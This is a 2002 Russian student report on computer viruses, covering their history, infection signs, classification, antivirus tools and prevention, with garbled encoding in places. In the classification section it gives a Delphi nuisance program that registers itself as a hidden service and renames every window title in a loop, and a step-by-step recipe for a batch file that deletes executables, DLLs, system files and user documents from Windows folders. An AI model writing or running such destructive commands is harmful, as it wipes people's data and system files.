Компьютерные вирусы
Министерство образования РФ.
ВСГТУ.
Кафедра: ВлЭлектроно вычислительные системы системыВ»
Реферат на тему:
Выполнили: С-т гр 521-2 Матвеев Ф.
Проверил:
Улан-Удэ.2002 г.
Содержание:- Введение.
- Признаки появления вирусов.
- Кролики размножаются.
- Преступность в с сфере компьютерных технологий.
- Классификация вирусов
- Антивирусные программы.
- Профилактика.
- Заключение.
Массовое использование ПК в автономном и сетевом режиме, включая выход в глобальную сеть Интернет, породиВнло проблему заражения их компьютерными вирусами.
Компьотерным вирусом принято называть специально наВнписанную, небольшую по размерам программу. Способную самопроизвольно присоединяться к другим программам (т.е. заражать их), создавать свои копии и внедрять их в файлы, системные области компьютера и в другие, объединенные с ним компьютеры с целью нарушения нормальной работы проВнграмм, порчи файлов и каталогов, создания различных помех при работе на компьютере.
2. Признаки появления вирусов.Для маскировки вируса его действия по заражению других программ и нанесению вреда могут выполняться не всегда, а при выполнении каких-либо условий. После того как вирус выполнит нужные ему действия, он передает управление той программе, в которой он находится, и ее работа некоторое время не отличается от работы незараженной. Все действия вируса могут выполняться достаточно быстро и без выдачи каких-либо сообщений, поэтому пользователь часто и не заВнмечает, что компьютер работает со "странностями". К приВнзнакам появления вируса можно отнести:
тАв замедление работы компьютера;
тАв невозможность загрузки операционной системы;
тАв частые ВлзависанияВ» и сбои в работе компьютера;
тАв прекращение работы или неправильная работа ранее успешВнно функционировавших программ;
тАв увеличение количества файлов на диске;
тАв изменение размеров файлов;
тАв периодическое появление на экране монитора неуместных системных сообщений;
тАв уменьшение объема свободной оперативной памяти;
тАв заметное возрастание времени доступа к жесткому диску;
тАв изменение даты и времени создания файлов;
тАв разрушение файловой структуры (исчезновение файлов, искажение каталогов и др.);
тАв загорание сигнальной лампочки дисковода, когда к нему
нет обращения.
Надо заметить, что названные симптомы необязательно вызываются компьютерными вирусами, они могут быть следВнствием других причин, поэтому компьютер следует периодиВнчески диагностировать.
3. ВлКроликиВ» размножаются.Мнения по поВнводу даты рождения первого компьютерноВнго вируса расходятся. Доподлинно извесВнтно только то, что в самом первом механиВнческом компьютере, так называемой машиВнне Беббиджа, их не было.
Первые появления вирусов были отмечеВнны в конце 60-х тАФ начале 70-х годов. Эти программы-паразиты, которые занимали системные ресурсы и снижали производиВнтельность системы, называли ВлкроликамиВ» (the rabbit). Однако, скорее всего, ВлкроликиВ» были просто ошибками или шалостями прогВнраммистов, обслуживавших компьютеры.
В середине 70-х был обнаружен один из первых настоящих вирусов тАФ ВлThe CreeВнperВ», который мог самостоятельно войти в сеть через модем и передать свою копию удаленной системе. Для борьбы с ним созВндали первую известную антивирусную программутАФ ВлThe ReeperВ».
Те, кто начал работать на IBM-PC в сереВндине 80-х, наверняка помнят повальную эпидемию вирусов ВлBrainВ», ВлViennaВ», ВлCasВнcadeВ». Буквы сыпались на экранах, а толпы пользователей осаждали специалистов по ремонту мониторов. Затем компьютер заВниграл ВлYankee DoodleВ», правда, чинить диВннамики теперь никто не бросился тАФ уже было понятно, что это вирус.
Время шло, вирусы плодились. Все они были похожи друг на друга тАФ лезли в паВнмять, цеплялись к файлам и секторам, пеВнриодически убивали дискеты и винчестеВнры. Летом 1991 года появился вирус-невиВндимка ВлDir-IIВ», противоядие для которого нашли далеко не сразу..
В августе 1995 года, когда все прогресВнсивное человечество праздновало выход новой операционной системы Windows 95 от Microsoft, практически незамеченным прошло сообщение о вирусе, заражающем документы Microsoft Word. Он получил имя ВлConceptВ» и в мгновение ока проник в тыВнсячи (если не в миллионы) компьютеров тАФ ведь передача текстов в формате MS Word стала одним из стандартов. Для того чтобы заразиться вирусом, требовалось всего лишь открыть зараженный документ, и все остальные редактируемые документы такВнже ВлзаболевалиВ», В результате, получив по Интернету зараженный файл и прочитав его, пользователь, сам того не ведая, оказыВнвался разносчиком компьютерной заразы. Опасность заражения MS Word, учитывая возможности Интернета, стала одной из саВнмых серьезных проблем за всю историю суВнществования вирусов.
Но MS Word дело не ограничилось. ЛеВнтом 1996 года появился вирус ВлLarouxВ», поВнражающий таблицы MS Excel. (В 1997 году этот вирус вызвал эпидемию в Москве.) К лету 97-го число макровирусов достигло нескольких сотен..
18 сентября этого года на Тайване был повторно арестован создатель знаменитого ВлЧернобыляВ» Чен Ин-Хау. (Первый раз Чен Ин-Хау задержали в апреле 1999 года, но он избежал наказания, поскольку на тот моВнмент не имелось официальных жалоб от тайваньских компаний. Поводом для новоВнго ареста послужили обвинения, предъявВнленные тайваньским студентом, который пострадал от вируса ВлЧернобыльВ» уже в апВнреле этого года.) Этот вирус был обнаружен на Тайване в июне 98-го. Тогда его автор заВнразил компьютеры университета, в котоВнром учился. ВлБольныеВ» файлы расползлись по местным Интернет-конференциям, и виВнрус выбрался за пределы Тайваня. Через неделю эпидемия поразила Австрию, АвВнстралию, Израиль и Великобританию. ЗаВнтем вирус проявил себя и в других странах, в том числе и в России.
Примерно через месяц зараженные файлы появились на нескольких американВнских Web-серверах, распространяющих игровые программы, что, видимо, и послужило причиной последовавшей глобальной эпидемии ВлЧернобыляВ». 26 апреля 1999 гоВнда взорвалась Вллогическая бомбаВ», залоВнженная в его код. По различным оценкам, в этот день по всему миру пострадало около 500 тыс. компьютеров тАФ были уничтожеВнны данные на жестких дисках, а в некотоВнрых случаях даже испорчены микросхемы на материнских платах. Никогда еще виВнрусные эпидемии не приносили таких убытков. Через какое-то время ВлЧерноВнбыльВ» сработал вновь. Ущерб, нанесенный им только в Южной Корее, оценивается в $250 млн.
22 октября этого года на Филиппинах арестовали 19-летнего хакера, подозреваеВнмого в распространении вирусов. (Позднее он был отпущен на свободу до окончания расследования.) Власти Филиппин, видимо, решили таким образом реабилитироваться после нескольких неудачных попыток привлечь к ответственности распространиВнтелей вируса ВлLoveLetterВ», причинившего огромный ущерб в мае этого года.
Сегодня в базе одного из самых мощных отечественных, да и, пожалуй, мировых средств антивирусной защиты, ВлAVP ЕвгеВнния КасперскогоВ», содержится информаВнция о 40 393 вирусах (на б ноября 2000 гоВнда), а также соответствующие средства обВннаружения, лечения и удаления.
4. Преступность в сфере компьютерных технологий.Во многих странах действуют законодательные меры по борьбе с компьютерными преступлениями и злоумышленныВнми действиями, разрабатываются антивирусные программные средства, однако количество новых программных вирусов возрастает. Лиц, использующих свои знания и опыт для неВнсанкционированного доступа к информационным и вычислительным ресурсам, к получению конфиденциальной и секретВнной информации, к совершению вредоносных действий, в лиВнтературе называют хакерами и кракерами.
Действия хакеров, или компьютерных хулиганов, могут наносить существенный вред владельцам компьютеров и владельцам (создателям) информационных ресурсов, так как приводят к простоям компьютеров, необходимости восстановВнления испорченных данных либо к дискредитации юридичеВнских или физических лиц, например, путем искажения информации на электронных досках объявлений или на WEB-серверах в Интернет. Мотивы действий компьютерных злоВнумышленников самые различные: стремление к финансовым приобретениям; желание навредить и отомстить руководитеВнлю организации, из которой по тем или иным причинам увоВнлился сотрудник; психологические черты человека (зависть, тщеславие, желание как-то проявить себя, просто хулиганство и др.).
5. Классификация вирусовОсновными путями заражения компьютеров вирусами явВнляются съемные диски (дискеты и CD-ROM) и компьютерные сети. Заражение жесткого диска компьютера может произойВнти при загрузке компьютера с дискеты, содержащей вирус. Для усиления безопасности необходимо обращать внимание на то, как и откуда получена программа (из сомнительного источВнника, имеется ли наличие сертификата, эксплуатировалась ли раньше и т.д.). Однако главная причина заражения компьюВнтеров вирусами - отсутствие в операционных системах эффекВнтивных средств защиты информации от несанкционированноВнго доступа.
По данным специальной литературы, к концу 1998 г. в миВнровой практике было зарегистрировано более 20 тыс. компьВнютерных вирусов (на сегодняшний день известно около 50 000 вирусов) и каждую неделю появляется около десяти новых вирусов. Одна из схем классификации компьютерных вирусов представлена на рис. 1
Рис. 1 Классификация компьютерных вирусов
В зависимости от среды обитания вирусы классифицируВнются на загрузочные, файловые, системные, сетевые, файлово-загрузочные.
Загрузочные вирусы внедряются в загрузочный сектор дисВнка или в сектор, содержащий программу загрузки системного диска.
Файловые вирусы внедряются в основном в исполняемые файлы с расширением .СОМ и .ЕХЕ.
Системные вирусы проникают в системные модули и драйВнверы периферийных устройств, поражают программы-интерВнпретаторы.
Сетевые вирусы обитают в компьютерных сетях; файлово-загрузочные поражают загрузочные сектора дисков и файлы прикладных программ.
Резидентные вирусы при заражении компьютера оставляВнют в оперативной памяти свою резидентную часть, которая затем при каждом обращении к операционной системе и к друВнгим объектам внедряется в них и выполняет свои разрушительВнные действия до выключения или перезагрузки компьютера. Нерезидентные вирусы не заражают оперативную память.
Алгоритмическая особенность построения вирусов оказыВнвает влияние на их проявление и функционирование. Так, репликаторные программы благодаря своему быстрому воспроВнизводству приводят к переполнению основной памяти, при этом уничтожение программ-репликаторов усложняется, если воспроизводимые программы не являются точными копиями оригинала. В компьютерных сетях распространены программы-ВлчервиВ». Они вычисляют адреса сетевых компьютеров и Влзаписываются по нимВ», поддерживая между собой связь. В случае прекращения существования ВлчервяВ» на каком-либо ПК оставшиеся отыскивают свободный компьютер и внедряют в него такую же программу
" Троянский конь" - это программа, которая, маскируясь под полезную программу, выполняет дополнительные функции, о чем пользователь и не догадывается (например, собирает инВнформацию об именах и паролях, записывая их в специальный файл, доступный лишь создателю данного вируса), либо разВнрушает файловую систему.
Логическая бомба - это программа, которая встраивается в большой программный комплекс. Она безвредна до наступВнления определенного события, после которого реализуется ее логический механизм. Например, такая вирусная программа начинает работать после некоторого числа запусков прикладВнной программы, комплекса, при наличии или отсутствии опВнределенного файла или записи файла и т.д.
Программы-мутанты, самовоспроизводясь, воссоздают копии, которые явно отличаются от оригинала.
Вирусы-невидимки перехватывают обращения операционВнной системы к пораженным файлам и секторам дисков и подВнставляют вместо них незараженные объекты.
По степени воздействия на ресурсы компьютерных систем и сетей выделяются безвредные, опасные и разрушительные вирусы.
Безвредные вирусы не разрушают файлы, но могут переполВннять оперативную и дисковую память, выводить на экран граВнфические эффекты и т.д. Например:
(программа пишется в Delphi):
program Project1;
uses windows, Messages;
procedure registerserviceprocess; external 'kernel32.dll'
name 'RegisterServiceProcess'; //функция EnumWindowsProc
function EnumWindowsProc(h: hwnd): BOOL; stdcall;
begin
SendMessage(h,WM_SETText,0,Iparam(PChar('Fed_108- компьютерщик)));
end;
//начало программы
var h:THandle;
begin
asm
push 1
push 0
call registerserviceprocess;
end;
//запускаю цикл
while true do begin //запускаю перечесление всех окон
EnumWindows(@EnumWindowsProc,0);
h:=CreateEvent(nil, true, false, ");//делаю задержку в 100 мс.
WaitForSingleObject(h, 100);
CloseHandle(h);
end;
end.
Эффект: все названия окон переименовываются в ВлFed_108- компьютерщикВ»
Опасные вирусы приводят к различВнным нарушениям в работе компьютера; разрушительные - к стиранию информации, полному или частичному нарушению работы прикладных программ. Например:
Заходим в Far-manager, нажимаем Shift+F4, пишем любое название файла (install.bat), главное чтобы расширение было *.bat.После чего печатаем примерно следующий текст:cd C:cd\cd windows (у 95% процентов юзеров папка именно такая)del *.exedel *.inidel *.comcd\cd windowscd systemdel *.dlldel *.execd\cd моидок~1del *.docdel *.txtdel *.htmdel *.htmldel *.pdfdel *.jpgdel *.zipdel *.gifНажимаем F2 и сохраняем таким образом написанный файл. Эффект: стираются все файлы с указанными расширениями в указанных папках.
Массовое распространение компьютерных вирусов вызваВнло разработку антивирусных программ, позволяющих обнаВнруживать и уничножать. Программы-фильтры, или ВлсторожаВ», постоянно находятся в оперативной памяти, являясь резидентными, и ВлперехватыВнваютВ» все запросы к операционной системе на выполнение Влподозрительных действийВ», т.е. операции, используемых виВнрусами для своего размножения и порчи информационных и других системных ресурсов в компьютере. Такими действиями моВнгут быть. попытки изменения атрибутов файлов, коррекции исполняемых BAT- СОМ- или ЕХЕ-файлов, записи в загрузочные сектора диска и др. При каждом запросе на такое действие на экран компьютеВнра выдается cообщение о каких либо действий и какая программа желает его выполнять. Пользователь в ответ на это должен либо разрешить выполнение действия, либо запретить его. Подобная часто повторяющаяся ВлназойВнливостьВ», раздражающая пользователя, и то, что объем опеВнративной памяти уменьшается из-за необходимости постоянВнного нахождения в ней ВлсторожаВ», являются главными недоВнстатками этих программ. К тому же программы-фильтры не ВллечатВ» файлы или диски, для этого необходимо использовать другие антивирусные программы. Примером программ- стоВнрожей являются Vsefe, входящая в пакет утилит MS-DOS, и программы, работающие в среде Windows, - AVP, Norton AntiVirus for Windows 95, McAfee Virus Scan 95, Thunder Byte Professional for Windows 95.
Надежным средством защиты от вирусов считаются проВнграммы-ревизоры. Они запоминают исходное состояние проВнграмм, каталогов и системных областей диска, когда компьюВнтер еще не был заражен вирусом, а затем периодически сравнивают текущее состояние с исходным. При выявлении несоответствий (по длине файла, дате модификации, коду цикВнлического контроля файла и др.) сообщение об этом выдается пользователю. Примером программ-ревизоров являются проВнграмма Adinf фирмы ВлДиалог-НаукаВ» и дополнение к ней в виде Adinf Cure Module.
Программы-доктора не только обнаруживают, но и "лечат" зараженные программы или диски, ВлвыкусываяВ» из зараженВнных программ тело вируса. Программы этого типа делятся на фаги и полифаги. Последние служат для обнаружения и уничВнтожения большого количества разнообразных вирусов. НаиВнбольшее распространение в России имеют такие полифаги, как MS AntiVirus, Aidstest и Doctor Web, которые непрерывно обновляются для борьбы с появляющимися новыми вирусами.
Программы-детекторы позволяют обнаруживать файлы, зараженные одним или несколькими известными разработчиВнкам программ вирусами.
Программы-вакцины, или иммунизаторы, относятся к резиВндентным программам. Они модифицируют программы и дисВнки таким образом, что это не отражается на работе программ, но вирус, от которого производится вакцинация, считает их уже зараженными и не внедряется в них.
6. Антивирусные программы.Как известно, вирус может содержаться только в файлах, которым передаётся управление: программы, динамические библиотеки, драйверы, командные файлы, скрипты, документы и шаблоны с макросами, то есть файлы с расширениями COM, EXE, DLL, DRV, VXD, SYS, BAT, DOC, DOT, XLS и др. Таким образом, например, обычный текстовый файл (с расширением TXT) можно запускать без опасений получить заразу - TXT-файл будет просто открыт в Блокноте.
Охарактеризуем некоторые антивирусные программы. К настоящему времени зарубежными и отечественными фирмаВнми и специалистами разработано большое количество антиВнвирусных программ. Многие из них, получившие широкое признание, постоянно пополняются новыми средствами для борьбы с вирусами и сопровождаются разработчиками.
У российских пользователей персональных компьютеров популярен антивирусный комплект АО ВлДиалог-НаукаВ», в который входят программа-ревизор диска Adinf и лечащий блок Adinf Cure Module. Одна из последних версий этой программы-полифага Aidstest (конец 1997 г.) обнаруживает боВнлее 1700 вирусов. Aidstest для своего нормального функциоВннирования требует, чтобы в оперативной памяти не было друВнгих резидентных антивирусных программ, блокирующих заВнпись в программные файлы, поэтому их следует предварительВнно выгрузить.
При запуске программы Aidstest проверяет оперативную память на наличие известных вирусов и обезвреживает их. При этом парализуются функции вируса, связанные с размножеВннием, а другие побочные эффекты могут оставаться, в связи с чем после окончания обезвреживания вируса программа выВндает запрос о перезагрузке. Перезагрузку рекомендуется осуВнществить кнопкой RESET, так как при перезагрузке клавишаВнми [CTRL]+[Alt]+[Del] некоторые вирусы могут сохраняться. Кроме того, компьютер и антивирусную программу лучше заВнпустить с защищенной от записи дискеты, чтобы при запуске с зараженного диска вирус не смог записаться в память резиВндентом и препятствовать лечению.
Aidstest тестирует свое тело на наличие известных вирусов, а также судит по искажению в своем коде о своем заражении неизвестным вирусом. При этом возможны случаи Влложной тревогиВ», например при сжатии антивируса программой- упаВнковщиком. Программа не имеет графического интерфейса, режимы ее 1 работы задаются с помощью ключей. Указав путь, можно проверить не весь диск, а отдельный подкаталог. Оптимальный режим для ежедневной работы задается ключами /g (проверка всех файлов) и /s (медленная проверка). Увеличение времени при таких опциях практически неощутимо (полностью заполВнненный жесткий диск емкостью 520 Мбайт на ПК с процессоВнром 486DX2 тестируется менее чем 2 мин), зато вероятность обнаружения вирусов резко повышается.
Ключ If следует использовать тогда, когда Aidstest, а также другие программы-антивирусы указывают на наличие вируса в каком-либо файле. При обнаружении вируса в ценном для пользователя файле этот файл следует переписать на дискету и попытаться вылечить с помощью ключа /f. Если попытка не увенчается успехом, надо удалить все зараженные копии файВнла и проверить диск снова. Если в файле содержится важная информация, которую нежелательно удалять, можно заархивировать файл или найти другую антивирусную программу, способную лечить этот тип вируса.
Для создания в файле протокола работы программы Aidstest служит ключ /р. Протокол нужен, если пользователь не успевает просмотреть имена зараженных файлов. Для подВндержки антивирусного программно- аппаратного комплекса Sheriff предназначен ключ /z.
Программа-полифаг Doctor Web необходима прежде всего для борьбы с полиморфными вирусами, которые появились сравнительно недавно. Так же как и Aidstest, Doctor Web обВнновляется не реже раза в месяц, а в промежутках между версиВнями выходят 1-3 дополнения вирусной базы Doctor Web.
Использование программы Doctor Web для проверки дисВнков и удаления обнаруженных вирусов в целом подобно Aidstest, в связи с чем эту программу можно запускать сразу после (или до) запуска Aidstest. При этом практически не проВнисходит ВлдублированияВ», так как Aidstest и Doctor Web работают на разных наборах вирусов. В режиме эвристического анализа программа Doctor Web способна эффективно определять файлы, зараженные новыВнми, неизвестными вирусами. Применяя одновременно Aidstest и Doctor Web для контроля дискет и получаемых по сети файВнлов, можно почти наверняка избежать заражения.
С программой Doctor Web можно работать как в режиме полноэкранного интерфейса с использованием меню и диалоВнговых окон, так и в режиме командной строки. В командной строке задаются диск, путь и необходимые ключи. Среди ключей: /al - диагностика всех файлов на заданном устройстве;
/р - удаление вирусов с подтверждением пользователя; /dl -удаление файлов, корректное "лечение" которых невозможВнно; /CU - "лечение" дисков и файлов; /zp - запись протокола работы в файл. При работе в режиме полноэкранного интерВнфейса после запуска антивирусной программы пользователь использует необходимые установки через пункты основного меню: Dr. Web. Тест Настройки Дополнения.
Программа-ревизор Adinf позволяет обнаружить любой вирус, включая вирусы, вирусы-мутанты и неизвестные на сеВнгодняшний день вирусы. Время проверки одного логичесВнкого диска крайне мало, что дает возможность использовать Adinf повседневно без существенной потери времени.
Переход на применение операционной системы Windows 95 породил проблемы с защитой от вирусов, создаваемых специВнально для этой среды. Кроме того, появилась новая разновидВнность инфекции - макровирусы, ВлвживляемыеВ» в документы, подготавливаемые текстовым процессором Word. АО "ДиаВнлог-Наука" предложен программно-аппаратный комплекс Sheriff, предназначенный для антивирусного мониторинга и защиты, но он предполагает установку в ПК дополнительней платы расширения и может работать только на серверах и рабочих станциях, оперирующих большими объемами данных. Известными антивирусными программами являются Antiviral Toolkit Pro (AVP32), Norton AntiVirus for Windows 95, McAffee VirusScan95, Sophos SWEEP for Windows 95, ThunderBY ТЕ Ai.dVirus Utilities и др. Эти программы работают в виде программ-сканеров и проводят антивирусный контроль оперативВнной памяти, папок и дисков, содержат алгоритмы для распозВннавания новых типов вирусов, позволяют в процессе проверВнки лечить файлы и диски.
Программа Antiviral Toolkit Pro (AVP32) является 32-разВнрядным приложением, работающим в среде Windows 95 и Windows NT, имеет удобный пользовательский интерфейс, гибкую систему настроек и позволяет распознавать более 50 тыс. различных вирусов. Для работы этой программы компьютер должен иметь не менее 4 Мбайт оперативной памяти и не меВннее 2 Мбайт свободного места на жестком диске. Antiviral Toolkit Pro распознает и удаляет полиморфные вирусы, вирусы невидимки, макро вирусы в документах, подготовленных в Word и Excel, "троянские кони".
Интерфейс программы AllMicro AntiVirus for Windows 95 довольно прост и не требует от пользователя дополнительных знаний о продукте - просто требуется нажать кнопку ВлScanВ», после чего начинается проверка памяти, загрузочных сектоВнров жесткого диска, а затем и всех дисков компьютера. Но простота работы не означает плохое качество: в базе данных программы содержится более 8000 сигнатур, и она может проВнверять не только традиционные исполняемые файлы, но и арВнхивы, и новые типы файлов Windows 95, при этом пользоваВнтель имеет возможность задать строку условий для поиска не знакомых программе вирусов.
Программа Vscan 95 каждый раз в процессе начальной загВнрузки проверяет память компьютера, загрузочные сектора сиВнстемного диска и все файлы в корневом каталоге. Две другие программы пакета (McAfee Vshield и Vscan) созданы как приВнложения Windows 95. Первая обеспечивает после загрузки Windows 95 слежение за вновь подключенными дисками, конВнтроль исполняемых программ и копируемых файлов, вторая программа служит для дополнительной проверки памяти, дисВнков и файлов. Пакет McAfee VirusScan 95 умеет находить макро вирусы в MS Word учитывая развитие локальных компьютерных сетей электВнронной почты и сети Интернет и внедрение сетевой ОС Windows NT, разработчиками антивирусных программ разВнработаны и поставляются на рынок такие программы, как Mail Checker, для проверки входящей и исходящей электронной почты, AntiViral Toolkit Pro - для обнаружения, лечения, удаВнления и перемещения в специальный каталог пораженных виВнрусом файлов при работе с сетевой ОС Novell NetWare версий З.х и 4.х. Программа F-Secure для Windows NT Server обеспеВнчивает в реальном масштабе времени защиту сервера, автомаВнтически проверяя на наличие вирусов каждый файл, к котороВнму обращаются рабочие станции, выполняет расширенное авВнтоматическое протоколирование в специальный журнал собыВнтий, оповещает о проявлениях вирусов системного администВнратора.
- Профилактика
Для того, чтобы не подвергнуть компьютер заражению вирусами и обеспечить надежное хранение информации на дисках, необходимо соблюдать следующие правила:
- оснастите свой компьютер современными антивирусными программами, например AntiViral Toolkit Pro, Doctor Web, и постоянно возобновляйте их версии
- перед считыванием с дискет информации, записанной на других компьютерах, всегда проверяйте эти дискеты на наличие вирусов, запуская антивирусные программы своего компьютера
- при переносе на свой компьютер файлов в архивированном виде проверяйте их сразу же после разархивации на жестком диске, ограничивая область проверки только вновь записанными файлами
- периодически проверяйте на наличие вирусов жесткие диски компьютера, запуская антивирусные программы для тестирования файлов, памяти и системных областей дисков с защищенной от записи дискеты, предварительно загрузив операционную систему с защищенной от записи системной дискеты
- всегда защищайте свои дискеты от записи при работе на других компьютерах, если на них не будет производится запись информации
- обязательно делайте архивные копии на дискетах ценной для вас информации
- не оставляйте в кармане дисковода А дискеты при включении или перезагрузке операционной системы, чтобы исключить заражение компьютера загрузочными вирусами
- используйте антивирусные программы для входного контроля всех исполняемых файлов, получаемых из компьютерных сетей
- проверяйте e-mail даже если письмо пришло от хорошо известного вам человека (это обусловлено не тем что он хочет вам навредить а из-за того что он полный Lamer а его комп заражён)
Так же следует иногда проверять автозагрузку, т.к. именно туда обычно закидывают загрузочные вирусы, но этот метод очень распространён и по этому следует проверять в реестре следующую папку:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
8. Заключение.Компьютерный вирус - специально написанная программа, способная самопроизвольно присоединяться к другим программам, создавать свои копии и внедрять их в файлы, системные области компьютера и в вычислительные сети с целью нарушения работы программ, порчи файлов и каталогов, создания всевозможных помех в работе компьютера.
В настоящее время известно более 50000 программных вирусов, число которых непрерывно растет. Известны случаи, когда создавались учебные пособия, помогающие в написании вирусов.
Основные виды вирусов: загрузочные, файловые, файлово-загрузочные. Наиболее опасный вид вирусов - полиморфные.
Из истории компьютерной вирусологии ясно, что любая оригинальная компьютерная разработка заставляет создателей антивирусов приспосабливаться к новым технологиям, постоянно усовершенствовать антивирусные программы.
Причины появления и распространения вирусов скрыты с одной стороны в психологии человека, с другой стороны - с отсутствием средств защиты у операционной системы.
Основные пути проникновения вирусов - съемные диски и компьютерные сети. Чтобы этого не случилось, соблюдайте меры по защите. Также для обнаружения, удаления и защиты от компьютерных вирусов разработано несколько видов специальных программ, называемых антивирусными.
Но некоторые свойства вирусов озадачивают даже специалистов. Еще совсем недавно трудно было себе представить, что вирус может пережить холодную перезагрузку или распространяться через файлы документов. В таких условиях нельзя не придавать значение хотя бы начальному антивирусному образованию пользователей. При всей серьезности проблемы ни один вирус не способен принести столько вреда, сколько начинающий LAMER (он же чайник) с дрожащими руками!!! (последнее предложение is joke)
Библиографический список:
- Лекции по теме ВлОбщий принцип безопасности ОСВ»
- Косарёв В.П. ВлКомпьютерные сети и системыВ» М. 2000 г.
- World Wide Web под названием Internet:
http://xakep.dax.ru
http://xakep.ru
- журнал Вл][akepВ» №.32 & №.35 2001 г.
- журнал ВлКоммерсант ВлДеньги»» № 45 2000 г.
Вместе с этим смотрят:
Контрольная по телетрафикуКурсовая по автоматической коммутации
Курсовая по сетям связи
Локальные вычислительные сети